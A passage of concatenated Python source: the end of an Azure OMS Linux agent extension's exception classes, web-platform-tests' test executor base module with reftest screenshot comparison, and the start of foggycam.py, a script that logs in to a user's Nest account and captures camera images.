else:
update_status_file(operation, str(exit_code), exit_status, message)
sys.exit(exit_code)
# Exceptions
# If these exceptions are expected to be caught by the main method, they
# include an error_code field with an integer with which to exit from main
class OmsAgentForLinuxException(Exception):
"""
Base exception class for all exceptions; as such, its error code is the
basic error code traditionally returned in Linux: 1
"""
error_code = 1
def get_error_message(self, operation):
"""
Return a descriptive error message based on this type of exception
"""
return '{0} failed with exit code {1}'.format(operation,
self.error_code)
class ParameterMissingException(OmsAgentForLinuxException):
"""
There is a missing parameter for the OmsAgentForLinux Extension
"""
error_code = MissingorInvalidParameterErrorCode
def get_error_message(self, operation):
return '{0} failed due to a missing parameter: {1}'.format(operation,
self)
class InvalidParameterError(OmsAgentForLinuxException):
"""
There is an invalid parameter for the OmsAgentForLinux Extension
ex. Workspace ID does not match GUID regex
"""
error_code = MissingorInvalidParameterErrorCode
def get_error_message(self, operation):
return '{0} failed due to an invalid parameter: {1}'.format(operation,
self)
class UnwantedMultipleConnectionsException(OmsAgentForLinuxException):
"""
This VM is already connected to a different Log Analytics workspace
and stopOnMultipleConnections is set to true
"""
error_code = UnwantedMultipleConnectionsErrorCode
def get_error_message(self, operation):
return '{0} failed due to multiple connections: {1}'.format(operation,
self)
class CannotConnectToOMSException(OmsAgentForLinuxException):
"""
The OMSAgent cannot connect to the OMS service
"""
error_code = CannotConnectToOMSErrorCode # error code to indicate no internet access
def get_error_message(self, operation):
return 'The agent could not connect to the Microsoft Operations ' \
'Management Suite service. Please check that the system ' \
'either has Internet access, or that a valid HTTP proxy has ' \
'been configured for the agent. Please also check the ' \
'correctness of the workspace ID.'
class OneClickException(OmsAgentForLinuxException):
"""
A generic exception for OneClick-related issues
"""
error_code = OneClickErrorCode
def get_error_message(self, operation):
return 'Encountered an issue related to the OneClick scenario: ' \
'{0}'.format(self)
class ManagedIdentityExtMissingException(OneClickException):
"""
This extension being present is required for the OneClick scenario
"""
error_code = ManagedIdentityExtMissingErrorCode
def get_error_message(self, operation):
return 'The ManagedIdentity extension is required to be installed ' \
'for Automatic Management to be enabled. Please set ' \
'EnableAutomaticManagement to false in public settings or ' \
'install the ManagedIdentityExtensionForLinux Azure VM ' \
'extension.'
class ManagedIdentityExtException(OneClickException):
"""
Thrown when we encounter an issue with ManagedIdentityExtensionForLinux
"""
error_code = ManagedIdentityExtErrorCode
def get_error_message(self, operation):
return 'Encountered an issue with the ManagedIdentity extension: ' \
'{0}'.format(self)
class MetadataAPIException(OneClickException):
"""
Thrown when we encounter an issue with Metadata API
"""
error_code = MetadataAPIErrorCode
def get_error_message(self, operation):
return 'Encountered an issue with the Metadata API: {0}'.format(self)
class OMSServiceOneClickException(OneClickException):
"""
Thrown when prerequisites were satisfied but could not retrieve the managed
workspace information from OMS service
"""
error_code = OMSServiceOneClickErrorCode
def get_error_message(self, operation):
return 'Encountered an issue with the OMS service: ' \
'{0}'.format(self)
if __name__ == '__main__' :
main()
|
base.py
|
import base64
import hashlib
import io
import json
import os
import threading
import traceback
import socket
import sys
from abc import ABCMeta, abstractmethod
from http.client import HTTPConnection
from typing import Any, Callable, ClassVar, Optional, Tuple, Type, TYPE_CHECKING
from urllib.parse import urljoin, urlsplit, urlunsplit
from .actions import actions
from .protocol import Protocol, BaseProtocolPart
if TYPE_CHECKING:
from ..webdriver_server import WebDriverServer
here = os.path.dirname(__file__)
def executor_kwargs(test_type, test_environment, run_info_data, **kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": test_environment.config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type in ("reftest", "print-reftest"):
executor_kwargs["screenshot_cache"] = test_environment.cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
# By default the executor may try to cleanup windows after a test (to best
# associate any problems with the test causing them). If the user might
# want to view the results, however, the executor has to skip that cleanup.
if kwargs["pause_after_test"] or kwargs["pause_on_unexpected"]:
executor_kwargs["cleanup_after_test"] = False
executor_kwargs["debug_test"] = kwargs["debug_test"]
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT",
3: "PRECONDITION_FAILED"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN",
4: "PRECONDITION_FAILED"}
def __call__(self, test, result, extra=None):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message, extra=extra, stack=stack)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def hash_screenshots(screenshots):
"""Computes the sha1 checksum of a list of base64-encoded screenshots."""
return [hashlib.sha1(base64.b64decode(screenshot)).hexdigest()
for screenshot in screenshots]
def _ensure_hash_in_reftest_screenshots(extra):
"""Make sure reftest_screenshots have hashes.
Marionette internal reftest runner does not produce hashes.
"""
log_data = extra.get("reftest_screenshots")
if not log_data:
return
for item in log_data:
if type(item) != dict:
# Skip relation strings.
continue
if "hash" not in item:
item["hash"] = hash_screenshots([item["screenshot"]])[0]
def get_pages(ranges_value, total_pages):
"""Get a set of page numbers to include in a print reftest.
:param ranges_value: Parsed page ranges as a list e.g. [[1,2], [4], [6,None]]
:param total_pages: Integer total number of pages in the paginated output.
:retval: Set containing integer page numbers to include in the comparison e.g.
for the example ranges value and 10 total pages this would be
{1,2,4,6,7,8,9,10}"""
if not ranges_value:
return set(range(1, total_pages + 1))
rv = set()
for range_limits in ranges_value:
if len(range_limits) == 1:
range_limits = [range_limits[0], range_limits[0]]
if range_limits[0] is None:
range_limits[0] = 1
if range_limits[1] is None:
range_limits[1] = total_pages
if range_limits[0] > total_pages:
continue
rv |= set(range(range_limits[0], range_limits[1] + 1))
return rv
def reftest_result_converter(self, test, result):
extra = result.get("extra", {})
_ensure_hash_in_reftest_screenshots(extra)
return (test.result_cls(
result["status"],
result["message"],
extra=extra,
stack=result.get("stack")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
def crashtest_result_converter(self, test, result):
return test.result_cls(**result), []
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TimedRunner(object):
def __init__(self, logger, func, protocol, url, timeout, extra_timeout):
self.func = func
self.logger = logger
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.extra_timeout = extra_timeout
self.result_flag = threading.Event()
def run(self):
for setup_fn in [self.set_timeout, self.before_run]:
err = setup_fn()
if err:
self.result = (False, err)
return self.result
executor = threading.Thread(target=self.run_func)
executor.start()
# Add twice the extra timeout since the called function is expected to
# wait at least self.timeout + self.extra_timeout and this gives some leeway
timeout = self.timeout + 2 * self.extra_timeout if self.timeout else None
finished = self.result_flag.wait(timeout)
if self.result is None:
if finished:
# flag is True unless we timeout; this *shouldn't* happen, but
# it can if self.run_func fails to set self.result due to raising
self.result = False, ("INTERNAL-ERROR", "%s.run_func didn't set a result" %
self.__class__.__name__)
else:
if self.protocol.is_alive():
message = "Executor hit external timeout (this may indicate a hang)\n"
# get a traceback for the current stack of the executor thread
message += "".join(traceback.format_stack(sys._current_frames()[executor.ident]))
self.result = False, ("EXTERNAL-TIMEOUT", message)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
elif self.result[1] is None:
# We didn't get any data back from the test, so check if the
# browser is still responsive
if self.protocol.is_alive():
self.result = False, ("INTERNAL-ERROR", None)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
return self.result
def set_timeout(self):
raise NotImplementedError
def before_run(self):
pass
def run_func(self):
raise NotImplementedError
class TestExecutor(object):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
__metaclass__ = ABCMeta
test_type = None # type: ClassVar[str]
# convert_result is a class variable set to a callable converter
# (e.g. reftest_result_converter) converting from an instance of
# URLManifestItem (e.g. RefTest) + type-dependent results object +
# type-dependent extra data, returning a tuple of Result and list of
# SubtestResult. For now, any callable is accepted. TODO: Make this type
# stricter when more of the surrounding code is annotated.
convert_result = None # type: ClassVar[Callable[..., Any]]
supports_testdriver = False
supports_jsshell = False
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def __init__(self, logger, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
self.logger = logger
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def reset(self):
"""Re-initialize internal state to facilitate repeated test execution
as implemented by the `--rerun` command-line argument."""
pass
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
try:
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
result = self.do_test(test)
except Exception as e:
exception_string = traceback.format_exc()
self.logger.warning(exception_string)
result = self.result_from_exception(test, e, exception_string)
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol, subdomain=False):
scheme = "https" if protocol == "h2" else protocol
host = self.server_config["browser_host"]
if subdomain:
# The only supported subdomain filename flag is "www".
host = "{subdomain}.{host}".format(subdomain="www", host=host)
return "{scheme}://{host}:{port}".format(scheme=scheme, host=host,
port=self.server_config["ports"][protocol][0])
def test_url(self, test):
return urljoin(self.server_url(test.environment["protocol"],
test.subdomain), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e, exception_string):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "INTERNAL-ERROR"
message = str(getattr(e, "message", ""))
if message:
message += "\n"
message += exception_string
return test.result_cls(status, message), []
def wait(self):
self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
is_print = False
def __init__(self, logger, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, logger, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class CrashtestExecutor(TestExecutor):
convert_result = crashtest_result_converter
class PrintRefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
is_print = True
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi, page_ranges):
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.get_screenshot_list(test, viewport_size, dpi, page_ranges)
if not success:
return False, data
screenshots = data
hash_values = hash_screenshots(data)
self.screenshot_cache[key] = (hash_values, screenshots)
rv = (hash_values, screenshots)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def reset(self):
self.screenshot_cache.clear()
def check_pass(self, hashes, screenshots, urls, relation, fuzzy):
"""Check if a test passes, and return a tuple of (pass, page_idx),
where page_idx is the zero-based index of the first page on which a
difference occurs if any, or None if there are no differences"""
assert relation in ("==", "!=")
lhs_hashes, rhs_hashes = hashes
lhs_screenshots, rhs_screenshots = screenshots
if len(lhs_hashes) != len(rhs_hashes):
self.logger.info("Got different number of pages")
return relation == "!=", None
assert len(lhs_screenshots) == len(lhs_hashes) == len(rhs_screenshots) == len(rhs_hashes)
for (page_idx, (lhs_hash,
rhs_hash,
lhs_screenshot,
rhs_screenshot)) in enumerate(zip(lhs_hashes,
rhs_hashes,
lhs_screenshots,
rhs_screenshots)):
comparison_screenshots = (lhs_screenshot, rhs_screenshot)
if not fuzzy or fuzzy == ((0, 0), (0, 0)):
equal = lhs_hash == rhs_hash
# sometimes images can have different hashes, but pixels can be identical.
if not equal:
self.logger.info("Image hashes didn't match%s, checking pixel differences" %
("" if len(hashes) == 1 else " on page %i" % (page_idx + 1)))
max_per_channel, pixels_different = self.get_differences(comparison_screenshots,
urls)
equal = pixels_different == 0 and max_per_channel == 0
else:
max_per_channel, pixels_different = self.get_differences(comparison_screenshots,
urls,
page_idx if len(hashes) > 1 else None)
allowed_per_channel, allowed_different = fuzzy
self.logger.info("Allowed %s pixels different, maximum difference per channel %s" %
("-".join(str(item) for item in allowed_different),
"-".join(str(item) for item in allowed_per_channel)))
equal = ((pixels_different == 0 and allowed_different[0] == 0) or
(max_per_channel == 0 and allowed_per_channel[0] == 0) or
(allowed_per_channel[0] <= max_per_channel <= allowed_per_channel[1] and
allowed_different[0] <= pixels_different <= allowed_different[1]))
if not equal:
return (False if relation == "==" else True, page_idx)
# All screenshots were equal within the fuzziness
return (True if relation == "==" else False, None)
def get_differences(self, screenshots, urls, page_idx=None):
from PIL import Image, ImageChops, ImageStat
lhs = Image.open(io.BytesIO(base64.b64decode(screenshots[0]))).convert("RGB")
rhs = Image.open(io.BytesIO(base64.b64decode(screenshots[1]))).convert("RGB")
self.check_if_solid_color(lhs, urls[0])
self.check_if_solid_color(rhs, urls[1])
diff = ImageChops.difference(lhs, rhs)
minimal_diff = diff.crop(diff.getbbox())
mask = minimal_diff.convert("L", dither=None)
stat = ImageStat.Stat(minimal_diff, mask)
per_channel = max(item[1] for item in stat.extrema)
count = stat.count[0]
self.logger.info("Found %s pixels different, maximum difference per channel %s%s" %
(count,
per_channel,
"" if page_idx is None else " on page %i" % (page_idx + 1)))
return per_channel, count
def check_if_solid_color(self, image, url):
extrema = image.getextrema()
if all(min == max for min, max in extrema):
color = ''.join('%02X' % value for value, _ in extrema)
self.message.append("Screenshot is solid color 0x%s for %s\n" % (color, url))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
page_ranges = test.page_ranges
self.message = []
# Depth-first search of reference tree, with the goal
# of reachings a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
page_idx = None
while stack:
hashes = [None, None]
screenshots = [None, None]
urls = [None, None]
nodes, relation = stack.pop()
fuzzy = self.get_fuzzy(test, nodes, relation)
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi, page_ranges)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
urls[i] = node.url
is_pass, page_idx = self.check_pass(hashes, screenshots, urls, relation, fuzzy)
if is_pass:
fuzzy = self.get_fuzzy(test, nodes, relation)
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1])
for item in reversed(nodes[1].references)))
else:
# We passed
return {"status": "PASS", "message": None}
# We failed, so construct a failure message
if page_idx is None:
# default to outputting the last page
page_idx = -1
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi, page_ranges)
if success:
screenshots[i] = screenshot
log_data = [
{"url": nodes[0].url,
"screenshot": screenshots[0][page_idx],
"hash": hashes[0][page_idx]},
relation,
{"url": nodes[1].url,
"screenshot": screenshots[1][page_idx],
"hash": hashes[1][page_idx]},
]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def get_fuzzy(self, root_test, test_nodes, relation):
full_key = tuple([item.url for item in test_nodes] + [relation])
ref_only_key = test_nodes[1].url
fuzzy_override = root_test.fuzzy_override
fuzzy = test_nodes[0].fuzzy
sources = [fuzzy_override, fuzzy]
keys = [full_key, ref_only_key, None]
value = None
for source in sources:
for key in keys:
if key in source:
value = source[key]
break
if value:
break
return value
def retake_screenshot(self, node, viewport_size, dpi, page_ranges):
success, data = self.get_screenshot_list(node,
viewport_size,
dpi,
page_ranges)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
def get_screenshot_list(self, node, viewport_size, dpi, page_ranges):
success, data = self.executor.screenshot(node, viewport_size, dpi, page_ranges)
if success and not isinstance(data, list):
return success, [data]
return success, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None # type: ClassVar[Type[Protocol]]
def __init__(self, logger, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, environ=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, logger, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.environ = environ if environ is not None else {}
self.output_handler_kwargs = None
self.output_handler_start_kwargs = None
def setup(self, runner):
self.protocol = self.protocol_cls(self, self.browser)
super().setup(runner)
def is_alive(self):
return self.protocol.is_alive()
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + self.extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message")
if message:
message += "\n"
message += traceback.format_exc()
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
def load(self, url):
pass
def execute_script(self, script, asynchronous=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
pass
def set_window(self, handle):
pass
def window_handles(self):
return []
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WdspecProtocol(Protocol):
server_cls = None # type: ClassVar[Optional[Type[WebDriverServer]]]
implements = [ConnectionlessBaseProtocolPart]
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
self.environ = os.environ.copy()
self.environ.update(executor.environ)
self.output_handler_kwargs = executor.output_handler_kwargs
self.output_handler_start_kwargs = executor.output_handler_start_kwargs
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args,
env=self.environ)
self.server.start(block=False,
output_handler_kwargs=self.output_handler_kwargs,
output_handler_start_kwargs=self.output_handler_start_kwargs)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive():
self.server.stop()
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
WebDriver. Things that are more different to WebDriver may need to create a
fully custom implementation."""
unimplemented_exc = (NotImplementedError,) # type: ClassVar[Tuple[Type[Exception], ...]]
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {cls.name: cls(self.logger, self.protocol) for cls in actions}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [strip_server(url)] + payload
return True, rv
def process_action(self, url, payload):
action = payload["action"]
cmd_id = payload["id"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
with ActionContext(self.logger, self.protocol, payload.get("context")):
result = action_handler(payload)
except self.unimplemented_exc:
self.logger.warning("Action %s not implemented" % action)
self._send_message(cmd_id, "complete", "error", "Action %s not implemented" % action)
except Exception:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message(cmd_id, "complete", "error")
raise
else:
self.logger.debug("Action %s completed with result %s" % (action, result))
return_message = {"result": result}
self._send_message(cmd_id, "complete", "success", json.dumps(return_message))
return False, None
def _send_message(self, cmd_id, message_type, status, message=None):
self.protocol.testdriver.send_message(cmd_id, message_type, status, message=message)
class ActionContext(object):
def __init__(self, logger, protocol, context):
self.logger = logger
self.protocol = protocol
self.context = context
self.initial_window = None
def __enter__(self):
if self.context is None:
return
self.initial_window = self.protocol.base.current_window
self.logger.debug("Switching to window %s" % self.context)
self.protocol.testdriver.switch_to_window(self.context)
def __exit__(self, *args):
if self.context is None:
return
self.logger.debug("Switching back to initial window")
self.protocol.base.set_window(self.initial_window)
self.protocol.testdriver._switch_to_frame(None)
self.initial_window = None
|
foggycam.py
|
"""FoggyCam captures Nest camera images."""
from urllib.request import urlopen
import urllib
import json
from http.cookiejar import CookieJar
import os
import traceback
import uuid
import threading
import time
import shutil
from datetime import datetime
from subprocess import call
class FoggyCam(object):
"""FoggyCam client class that performs capture operations."""
nest_username = ''
nest_password = ''
nest_user_id = ''
nest_access_token = ''
nest_access_token_expiration = ''
nest_current_user = None
nest_session_url = 'https://home.nest.com/session'
nest_user_url = 'https://home.nest.com/api/0.1/user/#USERID#/app_launch'
nest_api_login_url = 'https://webapi.camera.home.nest.com/api/v1/login.login_nest'
nest_image_url = 'https://nexusapi-us1.camera.home.nest.com/get_image?uuid=#CAMERAID#&width=#WIDTH#&cachebuster=#CBUSTER#'
nest_verify_pin_url = 'https://home.nest.com/api/0.1/2fa/verify_pin'
nest_user_request_payload = {
"known_bucket_types":["quartz"],
"known_bucket_versions":[]
}
nest_camera_array = []
is_capturing = False
cookie_jar = None
merlin = None
temp_dir_path = ''
local_path = ''
def __init__(self, username, password):
self.nest_password = password
self.nest_username = username
self.cookie_jar = CookieJar()
self.merlin = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cookie_jar))
if not os.path.exists('_temp'):
os.makedirs('_temp')
self.local_path = os.path.dirname(os.path.abspath(__file__))
self.temp_dir_path = os.path.join(self.local_path, '_temp')
self.initialize_session()
self.login()
self.initialize_user()
def initialize_twof_session(self, time_token):
"""Creates the first session to get the access token and cookie, with 2FA enabled."""
print ("Intializing 2FA session...")
target_url = self.nest_session_url + "?=_" + time_token
print (target_url)
try:
request = urllib.request.Request(target_url)
request.add_header('Authorization', 'Basic %s' % self.nest_access_token)
response = self.merlin.open(request)
session_data = response.read()
session_json = json.loads(session_data)
self.nest_access_token = session_json['access_token']
self.nest_access_token_expiration = session_json['expires_in']
self.nest_user_id = session_json['userid']
print (session_data)
except urllib.request.HTTPError as err:
print (err)
def initialize_session(self):
"""Creates the first session to get the access token and cookie."""
print ('INFO: Initializing session...')
payload = {'email':self.nest_username, 'password':self.nest_password}
binary_data = json.dumps(payload).encode('utf-8')
request = urllib.request.Request(self.nest_session_url, binary_data)
request.add_header('Content-Type', 'application/json')
try:
response = self.merlin.open(request)
session_data = response.read()
session_json = json.loads(session_data)
self.nest_access_token = session_json['access_token']
self.nest_access_token_expiration = session_json['expires_in']
self.nest_user_id = session_json['userid']
print ('INFO: [PARSED] Captured authentication token:')
print (self.nest_access_token)
print ('INFO: [PARSED] Captured expiration date for token:')
print (self.nest_access_token_expiration)
cookie_data = dict((cookie.name, cookie.value) for cookie in self.cookie_jar)
for cookie in cookie_data:
print (cookie)
print ('INFO: [COOKIE] Captured authentication token:')
print (cookie_data["cztoken"])
except urllib.request.HTTPError as err:
if err.code == 401:
error_message = err.read()
unauth_content = json.loads(error_message)
if unauth_content["status"].lower() == "verification_pending":
print ("Pending 2FA verification!")
two_factor_token = unauth_content["2fa_token"]
phone_truncated = unauth_content["truncated_phone_number"]
print ("Enter PIN you just received on number ending with", phone_truncated)
pin = input()
payload = {"pin":pin ,"2fa_token":two_factor_token}
binary_data = json.dumps(payload).encode('utf-8')
request = urllib.request.Request(self.nest_verify_pin_url, binary_data)
request.add_header('Content-Type', 'application/json')
try:
response = self.merlin.open(request)
pin_attempt = response.read()
parsed_pin_attempt = json.loads(pin_attempt)
if parsed_pin_attempt["status"].lower() == "id_match_positive":
print ("2FA verification successful.")
utc_date = datetime.utcnow()
utc_millis_str = str(int(utc_date.timestamp())*1000)
print ("Targetting new session with timestamp: ", utc_millis_str)
cookie_data = dict((cookie.name, cookie.value) for cookie in self.cookie_jar)
print ('INFO: [COOKIE] Captured authentication token:')
print (cookie_data["cztoken"])
self.nest_access_token = parsed_pin_attempt['access_token']
self.initialize_twof_session(utc_millis_str)
else:
print ("Could not verify. Exiting...")
exit()
except:
traceback.print_exc()
print ("Failed 2FA checks. Exiting...")
exit()
print ('INFO: Session initialization complete!')
def login(self):
"""Performs user login to get the website_2 cookie."""
print ('INFO: Performing user login...')
post_data = {'access_token':self.nest_access_token}
post_data = urllib.parse.urlencode(post_data)
binary_data = post_data.encode('utf-8')
print ("INFO: Auth post data")
print (post_data)
request = urllib.request.Request(self.nest_api_login_url, data=binary_data)
request.add_header('Content-Type', 'application/x-www-form-urlencoded')
response = self.merlin.open(request)
session_data = response.read()
print (session_data)
def initialize_user(self):
"""Gets the assets belonging to Nest user."""
print ('INFO: Initializing current user...')
user_url = self.nest_user_url.replace('#USERID#', self.nest_user_id)
print ('INFO: Requesting user data from:')
print (user_url)
binary_data = json.dumps(self.nest_user_request_payload).encode('utf-8')
request = urllib.request.Request(user_url, binary_data)
request.add_header('Content-Type', 'application/json')
request.add_header('Authorization', 'Basic %s' % self.nest_access_token)
response = self.merlin.open(request)
response_data = response.read()
print (response_data)
user_object = json.loads(response_data)
for bucket in user_object['updated_buckets']:
bucket_id = bucket['object_key']
if bucket_id.startswith('quartz.'):
camera_id = bucket_id.replace('quartz.', '')
print ('INFO: Detected camera configuration.')
print (bucket)
print ('INFO: Camera UUID:')
print (camera_id)
self.nest_camera_array.append(camera_id)
def capture_images(self, config=None):
"""Starts the multi-threaded image capture process."""
print ('INFO: Capturing images...')
self.is_capturing = True
if not os.path.exists('capture'):
os.makedirs('capture')
for camera in self.nest_camera_array:
camera_path = ''
# Determine whether the entries should be copied to a custom path
# or not.
if not config["path"]:
camera_path = os.path.join(self.local_path, 'capture', camera, 'images')
else:
camera_path = os.path.join(config["path"], 'capture', camera, 'images')
# Provision the necessary folders for images and videos.
if not os.path.exists(camera_path):
os.makedirs(camera_path)
hour = datetime.now().hour
if config['monitoring'][camera] is None or \
config['monitoring'][camera][0] <= hour < config['monitoring'][camera][1]:
self.perform_capture(config=config, camera=camera, camera_path=camera_path)
# image_thread = threading.Thread(target=self.perform_capture, args=(config, camera, camera_path))
# image_thread.daemon = True
# image_thread.start()
# while True:
# time.sleep(1)
def perform_capture(self, config=None, camera=None, camera_path=''):
"""Captures images."""
# while self.is_capturing:
file_id = str(uuid.uuid4().hex)
image_name = str(datetime.now())
image_name = image_name.replace(':', '-').replace(' ', '_')
image_url = self.nest_image_url.replace('#CAMERAID#', camera).replace('#CBUSTER#', str(file_id)).replace('#WIDTH#', str(config["width"]))
request = urllib.request.Request(image_url)
request.add_header('accept', 'accept:image/webp,image/apng,image/*,*/*;q=0.8')
